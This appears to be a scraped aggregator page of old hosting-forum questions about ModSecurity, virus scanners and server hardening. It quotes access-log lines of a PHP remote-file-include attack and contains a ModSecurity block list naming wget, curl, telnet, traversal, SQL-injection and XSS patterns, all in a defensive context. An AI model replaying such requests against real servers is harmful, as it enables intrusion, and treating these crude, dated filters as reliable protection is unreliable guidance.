How To Block Acunetix Scanner With Mod_security

Aug 12, 2007

Anobody knows appropriate rules to block Acunetix scanner to crawl my sites?

View 8 Replies


ADVERTISEMENT

Anybody Know How To Block This Specific PHP Inject Attack Using Mod_Security

Jun 17, 2008

how to block the following "WEB-PHP remote include path" attack using mod_security.

I have tried using Default Mod_Securty and also Mod_security from [url]

But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.

The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.

=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....

View 1 Replies View Related

EXploit Scanner (cxs)

Nov 6, 2009

CSF install the new version, I warned that the option Check for cxs. I had a few questions!

1 - is it free? And can be installed and will work?

2 - I like these things are additional to the installation?

3 - a bit about this new possibility to explain how to solve the case to get out of the red.

View 14 Replies View Related

Formmail Scanner

Jan 4, 2007

Does anyone know any open source tools that will scan cgi programs for exploits? Specifically for exploitable formmail scripts.

View 0 Replies View Related

What Email Scanner Gateway

Apr 10, 2009

What type of free email scanner gateway that you are using? I am using SA, Clam and Qmail. It's a little old and w/o the GUI for client to manage the settings.

I'm thinking to switch to something with GUI. Perhaps the combination of Exim, SA, Clam, MAilScanner and a GUI.

View 0 Replies View Related

Illegal Content Scanner

May 20, 2009

While reading a lot of posts and blogs about hosting, I just wanted to ask if someone has an idea on how to find files with illegal content.

I just tried a few bash scripts, but if there are a few thousand files, most of them stop working or produce server loads that stop the whole server.

Is there any software already out there or any script to scan the content on server for phrases?

View 12 Replies View Related

Secure Server From Scanner

Dec 4, 2008

i want to secure my server that scanner tools can not scan my site . because of one of my site is very important to do not scan of folder.

my server os : linux Centos 5

View 3 Replies View Related

ClamAV Scanner Resource Intensive?

Oct 22, 2006

I would like to know how resource intensive is ClamAV Scanner. Should I allow it or not to my VPS clients/resellers?

Can I set it to use it as root? How?

View 0 Replies View Related

Virus Scanner For Unix Server?

Aug 27, 2007

I wonder which virus scanner software is useful for Unix server(Centos 4.5). One of my client install SMF forum and when visitors access the forum,their virus scanner warn that site is affected by trojan. I used Clamav to scan entire home directory but seem nothing found.

View 4 Replies View Related

Linux Server Security Scanner

Apr 28, 2008

i have managed server. just i want sure if it is secured.

i want company to test my server, Security Scanner.

and give me report about my bugs.

View 7 Replies View Related

File System Vulnerablity Scanner

Feb 20, 2007

Are there any vulnerability scanners that search the local file system for vulnerable apps?

I don't need an external scanner. I want to scan all my users home dirs for bad apps - old coppermines, phpbb, etc.

I've not been able to find anything like this.

View 4 Replies View Related

Google Dork Scanner - Find Vulns?

Mar 25, 2008

Anyone use this poorly coded thing?

Goolag Scanner coded by CULT OF THE DEAD COW/cDc communications

Ive been using it for a bit, but i don't have any vulns on most of my box's.

Anyone else find this thing effective?

Ive passed it onto a few clients, seem to entertain them doing there own basic google powered security scans.

Here is a quick download; Goolag_Scanner_1.0.0.40_Setup.exe

Ive pulled a few results on other large sites, some interesting data thats spread out on google, strange how the crawlers get into it?

1.2 Software

To understand Goolag Scanner, it is important to understand how "dorks"
work (see 1.4) and with that, to establish the use of dorks as an
acceptable tool for information security experts, penetration testers,
and practical paranoids.

1.4 Terms And Abbreviations

* Dork = A detailed search pattern - heretofore used with Google's
search engine - that uses Google to show untapped results for web
sites previously indexed by Google.

The intention of a dork is to find results that might show
information relevant to security issues and/or confidential data.

From our point of view, dorks are not limited to Google. Frankly,
they are malicious patterns that apply to most search engines.

* gS = Goolag Scanner

* cDc = CULT OF THE DEAD COW/cDc communications

View 3 Replies View Related

Emails Not Displaying Mail Scanner Headers

Sep 14, 2008

i installed the latest version of the mail scanner on my linux server. It has been tested to be scanning and running properly. But one thing that is unusual is that the emails that is being processed by the mailscanner does not get tagged as its being processed by it. Hence i do not really know whether it has been processed.

When i check the email full headers, i am missing information like spam score, spam information and spam status. I did a check in the mailscanner.conf and the configuration was done correctly.

how can we set these information to show on the email header that it has been processed.

View 2 Replies View Related

Mod_Security 2.5, Or 2.0?

Apr 21, 2008

I have been using mod_security 1.9.x since it first release on apache 1.3 and apache 2.0.x, rules are great and they work perfect with no issues at all with any php-mysql website. Do you recommend using mod_security 2.0 or 2.5 ? (I do know that 2.5 does not work with apache 1.3).

View 2 Replies View Related

Mod_security Won't Log Anything

Apr 19, 2008

using mod_security, but I believe that I have it installed correctly with some rules that should be generating entries in the security audit log. No matter what I do, I can't seem to get mod_security to generate any sort of log entries.

I am using version 2.1.7. I compiled it with no problems. In my httpd.conf file, I have the following relevant lines:

LoadFile /usr/lib/libxml2.so
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf

I don't think there are any problems here, as I know it is running directives from the configuration file I edited. This is the file I'm working with:

modsecurity_crs_10_config.conf

Here are the relevant lines from the config file:

SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess On
SecResponseBodyMimeType (null) text/html text/plain text/xml
SecResponseBodyLimit 524288
SecDefaultAction "phase:2,auditlog,log,pass,status:500"
SecAuditEngine On
SecAuditLogType Serial
SecAuditLog logs/modsec_audit.log
SecAuditLogParts "ABIFHZ"
SecRequestBodyInMemoryLimit 131072
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 3

I know that the config file is being read because when I start apache, the log files (modsec_audit.log and modsec_debug.log) are created. The problem is that the files are empty and remain empty no matter what I do. I have even tried setting permissions on the files to 777.

Here are a couple of rules I created in an attempt to generate log entries:

SecRule REQUEST_BODY "viagra"
SecRule REMOTE_ADDR "^1.1.3.4$" auditlog,phase:1,allow

I put these in the same config file mentioned above. As far as I understand, the first rule should examine the request body (which would include data in POST requests) for the word, "viagra". Since my default action is phase:2,auditlog,log,pass,status:500, such requests should end up in the audit log. However, when I use a form on my site to post the word "viagra", nothing is generated in the log file.

The second rule, as far as I understand, should generate a log entry any time the IP address 1.2.3.4 is sent in the request headers. Instead of 1.2.3.4, of course, I have put in my real IP address. However, when I visit my server and browse pages, nothing is logged. I assume that my requests should generate log entries since I match the IP address.

View 3 Replies View Related

Mod_security

Dec 1, 2007

I am currently running a few small websites that use a CMS. Two are Dragonfly and one is Joomla.

I am getting sporadic errors with both systems that, upon research, seem to be related to Apache and the mod_security module. I am getting the following error:

Code:
Not Acceptable

An appropriate representation of the requested resource /somefolder/index.php could not be found on this server.

Well, I'm no idiot (although some people may tend to disagree ) and after some searching, I found that this most likely points to an Apache error. Most solutions suggest to put the following in my .htacess file for the site:

Code:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

It was noted that "SecFilterScanPOST Off" may or not be necessary. I have added the above to the .htaccess for each site (all 3 sites are subdomains) and have also added it to the .htaccess that is in the root folder for the site. Nothing has worked.

So my question is, is it possible that my webhost can override my .htaacess settings with their own? This is the only explanation that I can think of. But of course, I am no expert, which is why I turn to you good folks for help once again.

View 0 Replies View Related

Mod_security

Jul 27, 2008

I want to add some more rules to to mod_security, however I am unsure if some of them are already being used.

So would it cause any problems if there are duplicate rules for the time being till I can check through all the rules?

View 2 Replies View Related

Mod_security On RH 5 64

Jul 23, 2007

I am having lots of problems installing mod_security on RH5 64 w/ Plesk.

mainly related to apr0, subversion, and the headers.

Any reason why everyone recommends to use version 1.94 of mod_security rather than the latest version available on www.modsecurity.org?

View 3 Replies View Related

Mod_security

Oct 2, 2007

I've got this:

mod_security: Access denied with code 406. Error normalising REQUEST_URI: Invalid URL encoding detected: invalid characters used [hostname "www.mydomain.com"] [uri "/search/include/js_suggest/suggest.php?type=query&q=%u062E%u0636%u0631%u0627"]

how to disable/exclude this uri in mentioned host from being catched by mod_security?

View 4 Replies View Related

Mod_security 1 Or 2 - What Do You Use?

Mar 29, 2007

how many people are actually using mod_security 2 instead of 1?

And why did you choose the version you did?

View 4 Replies View Related

Mod_security & C99shell Anyone Help Please ?

Jun 5, 2007

I installed modsecurity from Addone module in Cpanel

When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini.

Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?

View 14 Replies View Related

Mod_security And Mod_filter

May 11, 2009

I tried using mod_security and mod_filter together. However, when I try to filter js files, I noticed that certain pages stop working, especially those using ajax.

View 2 Replies View Related

Mod_Security Configuration

Jul 24, 2009

I installed Mod_Security on my Cent OS server today and having some problem in configurating it.

Problem -

I have added this module in 'httpd.conf' file

Code:
<IfModule mod_security.c>
SecFilterEngine On

SecServerSignature "Apache"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On

SecFilterDefaultAction "deny,log,status:403"

SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

SecFilter "viewtopic.php?" chain
SecFilter "chr(([0-9]{1,3}))" "deny,log"

SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "/../../ "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|n)+>"
</IfModule>

But my website is multi forum hosting and requires 'index.php' file to pass parameter to make it work.

Example -

[url]
[url]
[url]

So i had to delete below mention code from above module.

Code:
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

View 0 Replies View Related

Mod_security Rules

May 25, 2009

Is it possible to disable a particular mod_security rule for particular directory or the rules are global?

View 4 Replies View Related

Mod_security Rules In WHM

Aug 15, 2008

I just installed mod_security via WHM, and want to know what rule should I enter to prevent some URLs from being opened.

For example, if URL contains word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.

View 4 Replies View Related

Mod_security And ISPConfig3

May 20, 2009

I have installed a new server with debian lenny 5, ISPConfig 3.0.1.1 and the newest mod_security and implemented the default rules.

I deactivated the rule detecting IP in pageheaders.

Then I got another problem. Some actions of ISPConfig are detected as "remote file access attempt", severity "critical", tag "web attack/file injection" data "/etc/"

detected by rule file crs_40 line 114, id 950005

question: how do I authorize ISPConfig and only ISPConfig to perform such requests on the server?

View 4 Replies View Related

How To Set The Rules Of MOD_Security

Jun 4, 2008

how to set the rules of MOD_Security.

Another question for professionals:

Q: What are the best rules to secure my server? I'd appreciate if you managed to attach these rules to your replies. // FYI, I host VBulletin portals.

View 3 Replies View Related

Mod_Security - Using RBLs

Dec 24, 2008

Trying to use an RBL with ModSecurity but this matches everything whether listed or not.
SecRule REMOTE_ADDR "@rbl bb.barracudacentral.org" "log,deny,msg:'POST RBL Comment Spammer'"

What I would like to do is do an RBL lookup and any POST operations.

View 2 Replies View Related

Mod_security 2 Rules

Feb 25, 2008

make this rules work on apache 2 mod_security 2?

View 4 Replies View Related

Mod_security 2 Rules

Dec 17, 2008

Any good secure rules for mod_security 2 that work well for shared servers?

Can someone share what rules you are using to secure your shared servers. Have tried a few different sets of rules, but a few customers always end up with errors and disabling it for their domain name doesn't sound like a safer option for them or the server.

Share your mod_sec 2 rules.

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved